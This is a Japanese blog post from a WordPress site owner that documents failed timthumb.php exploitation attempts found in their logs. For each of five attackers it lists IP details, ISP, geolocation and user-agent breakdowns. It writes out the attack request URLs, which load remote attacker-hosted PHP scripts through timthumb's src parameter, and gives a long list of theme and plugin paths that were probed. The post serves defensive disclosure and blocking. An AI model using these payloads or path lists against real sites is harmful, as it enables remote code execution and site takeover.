db_error.phpを作成してから色々とデータベース関連のエラーがメールで送られてくるようになりました。
通常このdb_error関連のエラーは通常のメールボックスに入っているのですが、今回はスパムとなぜか認定されており、原因をちょっと探ったところ、Wordpressでは有名なtimthumb.phpの脆弱性をつこうとしている関係であったと確認してしまいました。
攻撃者には残念ながらうちのWordPressのサイトではtimthumb等は使っておりませんので脆弱性をついた攻撃は失敗に終わっていますが以下にその攻撃者の関連情報を晒しておきます。
実は、ログを見たらこのtimthumb攻撃が大量に有りました。timthumbのやつだけ今年の始め頃からのだけを抽出した所実に600回超やられていたのが発覚!攻撃者のIPをとりあえずはじかなければなりませんね。
-
攻撃者その1:攻撃日時 2012/05/22 13:04:16 ~13:32:17 UTC の間に5回攻撃してきた。
攻撃時に使用した方法
/(当サイトの記事名)/wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
/wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php
//wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
/(当サイトの記事名)/wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php
攻撃者のIPアドレス:178.32.137.94
IPアドレスから分かる一般的な情報
IP: 178.32.137.94 Decimal: 2988476766 Hostname: 178-32-137-94.ovh.net ISP: Ovh Systems Organization: OVH Srl Services: None detected Type: Assignment: Static IP IPアドレスから分かるエリア情報(Geolocation)
国: イタリア 
緯度(Latitude): 42.8333 経度(Longitude): 12.8333 その他情報
リモートホスト 178-32-137-94.ovh.net 攻撃者のユーザーエージェント Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)
Firefox 3.6Mozilla MozillaProductSlice.Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore 5.0 Mozilla version Windows Platform U Security values: - N for no security
- U for strong security
- I for weak security
Windows NT 5.1 Operating System:
Windows XPen-US Language Tag, indicates the language for which the client had been localized (e.g. menus and buttons in the user interface)
en-US =English – United Statesrv:1.9.2 CVS Branch Tag
The version of Gecko being used in the browserGecko Gecko engine inside 20100115 Build Date:
the date the browser was builtFirefox Name :
Firefox3.6 Firefox version -
攻撃者その2:攻撃日時 2012/04/18 ~ UTC の間に 120回の攻撃
及び 2012/05/13 ~ UTC の間に 121回の攻撃をしてきた。攻撃時に使用した方法(以下121項目)ダブリは除く
/wp-content/themes/8q/scripts/timthumb.php/wp-content/themes/aerial/lib/timthumb.php/wp-content/themes/aesthete/timthumb.php/wp-content/themes/albizia/includes/timthumb.php/wp-content/themes/amphion-lite/script/timthumb.php/wp-content/themes/aqua-blue/includes/timthumb.php/wp-content/themes/aranovo/scripts/timthumb.php/wp-content/themes/arras/library/timthumb.php/wp-content/themes/arras-theme/library/timthumb.php/wp-content/themes/arthemix-bronze/scripts/timthumb.php/wp-content/themes/arthemix-green/scripts/timthumb.php/wp-content/themes/artisan/includes/timthumb.php/wp-content/themes/a-simple-business-theme/scripts/timthumb.php/wp-content/themes/a-supercms/timthumb.php/wp-content/themes/aureola/scripts/timthumb.php/wp-content/themes/aurorae/timthumb.php/wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/timthumb.php/wp-content/themes/automotive-blog-theme/timthumb.php/wp-content/themes/black_eve/timthumb.php/wp-content/themes/blex/scripts/timthumb.php/wp-content/themes/bloggnorge-a1/scripts/timthumb.php/wp-content/themes/blogified/timthumb.php/wp-content/themes/blue-corporate-hyve-theme/timthumb.php/wp-content/themes/bluemag/library/timthumb.php/wp-content/themes/blue-news/scripts/timthumb.php/wp-content/themes/bombax/includes/timthumb.php/wp-content/themes/breakingnewz/timthumb.php/wp-content/themes/brightsky/scripts/timthumb.php/wp-content/themes/brochure-melbourne/includes/timthumb.php/wp-content/themes/business-turnkey/assets/js/timthumb.php/wp-content/themes/calotropis/includes/timthumb.php/wp-content/themes/comet/scripts/timthumb.php/wp-content/themes/conceditor-wp-strict/scripts/timthumb.php/wp-content/themes/constructor/libs/timthumb.php/wp-content/themes/constructor/timthumb.php/wp-content/themes/coverht-wp/scripts/timthumb.php/wp-content/themes/cover-wp/scripts/timthumb.php/wp-content/themes/dark-dream-media/timthumb.php/wp-content/themes/deep-blue/timthumb.php/wp-content/themes/dimenzion/timthumb.php/wp-content/themes/epione/script/timthumb.php/wp-content/themes/evr-green/scripts/timthumb.php/wp-content/themes/famous/timthumb.php/wp-content/themes/featuring/timthumb.php/wp-content/themes/fliphoto/timthumb.php/wp-content/themes/flix/timthumb.php/wp-content/themes/fresh-blu/scripts/timthumb.php/wp-content/themes/go-green/modules/timthumb.php/wp-content/themes/granite-lite/scripts/timthumb.php/wp-content/themes/greydove/timthumb.php/wp-content/themes/greyzed/functions/efrog/lib/timthumb.php/wp-content/themes/heli-1-wordpress-theme/images/timthumb.php/wp-content/themes/ideatheme/timthumb.php/wp-content/themes/impressio/timthumb/timthumb.php/wp-content/themes/iwana-v10/timthumb.php/wp-content/themes/likehacker/timthumb.php/wp-content/themes/litepress/scripts/timthumb.php/wp-content/themes/magup/timthumb.php/wp-content/themes/make-money-online-theme-1/scripts/timthumb.php/wp-content/themes/make-money-online-theme-2/scripts/timthumb.php/wp-content/themes/make-money-online-theme-3/scripts/timthumb.php/wp-content/themes/make-money-online-theme-4/scripts/timthumb.php/wp-content/themes/make-money-online-theme/scripts/timthumb.php/wp-content/themes/moi-magazine/timthumb.php/wp-content/themes/my-heli/images/timthumb.php/wp-content/themes/mymag/timthumb.php/wp-content/themes/mystique/extensions/auto-thumb/timthumb.php/wp-content/themes/nash/theme-assets/php/timthumb.php/wp-content/themes/neofresh/timthumb.php/wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php/wp-content/themes/pearlie/scripts/timthumb.php/wp-content/themes/pico/scripts/timthumb.php/wp-content/themes/postage-sydney/includes/timthumb.php/wp-content/themes/probluezine/timthumb.php/wp-content/themes/regal/timthumb.php/wp-content/themes/shaan/timthumb.php/wp-content/themes/shadow/timthumb.php/wp-content/themes/simple-but-great/timthumb.php/wp-content/themes/simplenews_premium/scripts/timthumb.php/wp-content/themes/simple-red-theme/timthumb.php/wp-content/themes/simplewhite/timthumb.php/wp-content/themes/slidette/timThumb/timthumb.php/wp-content/themes/spotlight/timthumb.php/wp-content/themes/squeezepage/timthumb.php/wp-content/themes/suffusion/timthumb.php/wp-content/themes/swift/includes/timthumb.php/wp-content/themes/swift/timthumb.php/wp-content/themes/the_dark_os/tools/timthumb.php/wp-content/themes/tm-theme/js/timthumb.php/wp-content/themes/totallyred/scripts/timthumb.php/wp-content/themes/travelogue-theme/scripts/timthumb.php/wp-content/themes/true-blue-theme/timthumb.php/wp-content/themes/ttnews-theme/timthumb.php/wp-content/themes/twittplus/scripts/timthumb.php/wp-content/themes/typographywp/timthumb.php/wp-content/themes/ugly/timthumb.php/wp-content/themes/unity/timthumb.php/wp-content/themes/versitility/timthumb.php/wp-content/themes/vibefolio-teaser-10/scripts/timthumb.php/wp-content/themes/wpbus-d4/includes/timthumb.php/wp-content/themes/wp-creativix/scripts/timthumb.php/wp-content/themes/wp-newsmagazine/scripts/timthumb.php/wp-content/themes/wp-perfect/js/timthumb.php/wp-content/themes/wp-premium-orange/timthumb.php/wp-content/themes/zcool-like/timthumb.php/wp-content/themes/lifestyle/timthumb.php/wp-content/themes/Karma/timthumb.php/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php/wp-content/plugins/wp-marketplace/libs/timthumb.php/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php/wp-content/plugins/vk-gallery/lib/timthumb.php/wp-content/plugins/cac-featured-content/timthumb.php/wp-content/plugins/rent-a-car/libs/timthumb.php/wp-content/plugins/lisl-last-image-slider/timthumb.php/wp-content/plugins/islidex/js/timthumb.php/wp-content/plugins/kino-gallery/timthumb.php/wp-content/plugins/cms-pack/timthumb.php/wp-content/plugins/a-gallery/timthumb.php/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php/wp-content/plugins/verve-meta-boxes/tools/timthumb.php/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php
攻撃者のIPアドレス:91.201.64.85
IPアドレスから分かる一般的な情報
IP: 91.201.64.85 Decimal: 1539915861 Hostname: 91.201.64.85 ISP: DonEkoService Ltd Organization: DonEkoService Ltd Services: None detected Type: Broadband Assignment: Static IP IPアドレスから分かるエリア情報(Geolocation)
国: Russian Federation 緯度(Latitude): 60 経度(Longitude): 100 その他情報
リモートホスト 91.201.64.85 攻撃者のユーザーエージェント Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)
Internet Explorer 6.0Mozila ??? 4.0 ??? compatible Compatibility flag
Indicates that this browser is compatible with a common set of featuresMSIE 6.0 Name :
Internet Explorer version 6.0Windows NT 5.1 Operating System:
Windows XP -
攻撃者その3:攻撃日時 2012/01/16 08:48:30 ~08:58:46 UTC の間に3回攻撃してきた。
攻撃時に使用した方法(重複は除く)
/(当サイトの記事名)/wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php
/wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php
攻撃者のIPアドレス:176.9.44.3
IPアドレスから分かる一般的な情報
IP: 176.9.44.3 Decimal: 2953391107 Hostname: h124526.exima-online.net ISP: Hetzner Online AG Organization: Hetzner Online AG Services: None detected Type: Corporate Assignment: Static IP IPアドレスから分かるエリア情報(Geolocation)
国: ドイツ 緯度(Latitude): 51 経度(Longitude): 9 その他情報
リモートホスト h124526.exima-online.net 攻撃者のユーザーエージェント BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212 ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)
BlackBerryBlackBerry8310 Name :
BlackBerry model 83104.5.0.55 Operating System:
BlackBerryOS
OS Version 4.5.0Profile Profile, see next line MIDP-2.0 Mobile Information Device Profile, a specification published for the use of Java on embedded devices
Version 2.0Configuration Configuration, see next line CLDC-1.1 Connected Limited Device Configuration, is a specification of a framework for Java ME applications
Version 1.1VendorID Id of the vendor 212 Vendor : Etisalat/Etisalat Nigeria/Etisalat Misr Description: Browser for the BlackBerry smartphone -
攻撃者その4:攻撃日時 2012/02/16 4:51:34 ~4:51:41 UTC の間に3回攻撃してきた。
攻撃時に使用した方法(重複は除く)
/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
/(当サイトのカテゴリー名)/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
/(当サイトのカテゴリー名)/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
攻撃者のIPアドレス:178.255.45.99
IPアドレスから分かる一般的な情報
IP: 178.255.45.99 Decimal: 3003067747 Hostname: da01.gda.vipower.pl ISP: Artnet Spolka z ograniczona odpowiedzialnoscia Organization: Vibiznes Services: None detected Type: Assignment: Static IP IPアドレスから分かるエリア情報(Geolocation)
国: ポーランド 州/リージョン: Mazowieckie 都市: Warsaw 緯度(Latitude): 52.25 経度(Longitude): 21 その他情報
リモートホスト da01.gda.vipower.pl 攻撃者のユーザーエージェント Mozilla/3.0 (OS/2; U) ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)
Netscape 3.0Mozilla MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore 3.0 Browser version OS/2 Operating System:
OS/2U Security values: - N for no security
- U for strong security
- I for weak security
-
攻撃者その5:攻撃日時 2012/05/22 16:56:39 ~16:56:43 UTC の間に2回攻撃してきた。
攻撃時に使用した方法(重複は除く)
/(当サイトの記事名)/wp-content/themes/Quadro/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
/wp-content/themes/Quadro/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
攻撃者のIPアドレス:184.107.145.18
IPアドレスから分かる一般的な情報
IP: 184.107.145.18 Decimal: 3094057234 Hostname: 184.107.145.18 ISP: Iweb Technologies Organization: Gate Services: None detected Type: Broadband Assignment: Static IP IPアドレスから分かるエリア情報(Geolocation)
Country: Canada State/Region: Quebec City: Montreal Latitude: 45.5 Longitude: -73.5833 Postal Code: h3e1z6 その他情報
リモートホスト 184.107.145.18 攻撃者のユーザーエージェント Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)
SafariMozilla MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore 5.0 Mozilla version SymbianOS Operating System:
SymbianOS9.1 SymbianOS version U Security values: - N for no security
- U for strong security
- I for weak security
en-us Language Tag, indicates the language for which the client had been localized (e.g. menus and buttons in the user interface)
en-us =English – United StatesAppleWebKit The Web Kit provides a set of core classes to display web content in windows 413 Web Kit build KHTML Open Source HTML layout engine developed by the KDE project like Gecko like Gecko… Safari Name :
Safari413 Safari build number es61i ノキアの携帯モデル名
Firefox 3.6
Windows XP
English – United States
Internet Explorer 6.0
BlackBerry
Netscape 3.0
Safari
SymbianOS
コメント